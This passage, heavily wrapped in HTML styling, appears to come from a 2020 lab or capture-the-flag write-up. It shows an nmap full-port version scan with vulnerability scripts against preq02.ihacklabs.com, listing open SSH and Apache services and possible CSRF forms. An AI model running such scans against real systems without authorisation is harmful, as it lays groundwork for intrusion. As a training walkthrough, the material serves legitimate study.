font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">hc0n2020</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"># </span><span style="color: #fcc28c; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">nmap</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: #fcc28c; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">-sS</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: #fcc28c; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">-sV</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: #fcc28c; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">preq02</span><span style="color: #ade5fc; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">.ihacklabs.com</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: #fcc28c; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">-p-</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: #fcc28c; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">--script</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: #fcc28c; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">vuln</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: #fcc28c; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Starting</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: #fcc28c; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Nmap</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: #fcc28c; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">7</span><span style="color: #ade5fc; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">.80</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> ( </span><span style="color: #ffffaa; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">https</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">:</span><span style="color: #888888; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">//nmap.org ) at 2020-01-11 CET</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Nmap scan report for preq02.ihacklabs.com (</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">54.36</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">.</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">134.34</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">)</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Host is up (</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">0.042s</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> latency).</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">rDNS record for </span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">54.36</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">.</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">134.34</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">: ip34.ip-</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">54</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">-</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">36</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">-</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">134</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">.eu</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Not </span><span style="color: #ffffaa; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">shown</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">: </span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">65533</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> filtered ports</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">PORT STATE SERVICE VERSION</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">22</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">/tcp open ssh OpenSSH </span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">7.4</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">p1 Debian </span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">10</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">+deb9u7 (protocol </span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">2.0</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">)</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">|</span><span style="color: #ffffaa; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">_clamav-exec</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">: </span><span style="color: #ffffaa; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">ERROR</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">: Script execution failed (use -d to debug)</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">80</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">/tcp open http Apache httpd </span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">2.4</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">.</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">25</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> ((Debian))</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">|</span><span style="color: #ffffaa; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">_clamav-exec</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">: </span><span style="color: #ffffaa; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">ERROR</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">: Script execution failed (use -d to debug)</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">| </span><span style="color: #ffffaa; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">http-csrf</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">: </span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">| Spidering limited </span><span style="color: #ffffaa; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">to</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">: maxdepth=</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">3</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">; maxpagecount=</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">20</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">; withinhost=preq02.ihacklabs.com</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">| Found the following possible CSRF </span><span style="color: #ffffaa; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">vulnerabilities</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">: </span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">| </span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">| </span><span style="color: #ffffaa; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Path</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">: </span><span style="color: #ffffaa; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">http</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">:</span><span style="color: #888888; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">//preq02.ihacklabs.com:80/manual/de/index.html</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">| Form </span><span style="color: #ffffaa; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">id</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">: </span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">| Form </span><span style="color: #ffffaa; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">action</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">: </span><span style="color: #ffffaa; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">http</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">:</span><span style="color: #888888; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">//www.google.com/search</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">| </span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">| </span><span style="color: #ffffaa; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Path</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">: </span><span style="color: #ffffaa; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">http</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">:</span><span style="color: #888888; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">//preq02.ihacklabs.com:80/manual/ja/index.html</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">| Form </span><span style="color: #ffffaa; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">id</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">: </span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">| Form </span><span style="color: #ffffaa; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">action</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">: </span><span style="color: #ffffaa; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">http</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">:</span><span style="color: #888888; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">//www.google.com/search</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">| </span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">| </span><span style="color: #ffffaa; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Path</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">: </span><span style="color: #ffffaa; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">http</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">:</span><span style="color: #888888; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">//preq02.ihacklabs.com:80/manual/pt-br/index.html</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">| Form </span><span style="color: #ffffaa; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">id</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">: </span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">| Form </span><span style="color: #ffffaa; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">action</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">: </span><span style="color: #ffffaa; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">http</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">:</span><span style="color: #888888; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">//www.google.com/search</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">| </span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">| </span><span style="color: #ffffaa; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Path</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">: </span><span style="color: #ffffaa; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">http</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">:</span><span style="color: #888888; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">//preq02.ihacklabs.com:80/manual/zh-cn/index.html</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">| Form </span><span style="color: #ffffaa; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">id</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">: </span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">| Form </span><span style="color: #ffffaa; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">action</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">: </span><span style="color: #ffffaa; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">http</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">:</span><span style="color: #888888; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">//www.google.com/search</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">| </span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">| </span><span style="color: #ffffaa; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Path</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">: </span><span style="color: #ffffaa; font-family: Consolas; font-size: 11pt; font-variant-east-asian: 